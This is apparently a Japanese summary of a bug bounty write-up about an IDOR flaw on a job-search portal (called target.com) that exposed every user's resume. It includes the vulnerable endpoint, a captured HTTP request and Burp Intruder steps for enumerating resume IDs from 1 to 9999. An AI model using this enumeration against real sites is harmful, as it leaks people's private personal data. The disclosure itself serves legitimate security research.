Hello there, ('ω')ノ
履歴書をハッキングした方法を。
脆弱性:
IDOR
承認の欠陥
情報開示
記事:
https://vbharad.medium.com/how-i-hacked-everyones-resume-cv-s-and-got-851aaa4d75d9
intigriti.comでバグバウンティを開始し、プログラムを検索しているときに。
求人検索ポータルに関連する1つのプログラムを入手して。
intigritiは、就職活動に関するプログラムは非常に多くて。
ターゲットドメインをtarget.comと仮定して。
脆弱なドメイン:
Target.com
脆弱性タイプ:
機密情報の開示
影響を受けるエンドポイント:
https://www.target.com/profile/cv/
攻撃タイプ:
リモート
影響:
すべての履歴書の公開
テスト中に、ログインに間違ったパスワードを入力すると。
受信トレイにプロファイル情報に関連する1つのメールが届いて。
その情報で履歴書のエンドポイントを取得できて。
https://www.target.com/profile-portlets/cv/
履歴書が公開されているかどうかを確認するために。
プライベートブラウザでこのエンドポイントを開いて。
アカウントでログインしていなくても履歴書をダウンロードできて。
下記は、他のユーザの履歴書を取得するためのステップで。
再現する手順:
1.自分の履歴書のパスは下記のとおりで。
https://www.target.com/profile-portlets/cv/3535924
2.下記は、Burp Suiteでリクエストをキャプチャしたもので。
リクエスト:
GET /profile-portlets/cv/3535924 HTTP/1.1
Host: www.target.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
3.次に、このリクエストをIntruderに送信して手動テストを実行することに。
4.Intruderでパスを設定して。
ペイロードを1から9999の番号に設定して、攻撃を開始して。
5.Intruderからステータスが200の任意の番号を選択すると。
履歴書のダウンロードが再開されて。
GET /profile-portlets/cv/3535583 HTTP/1.1
Best regards, (^^ゞ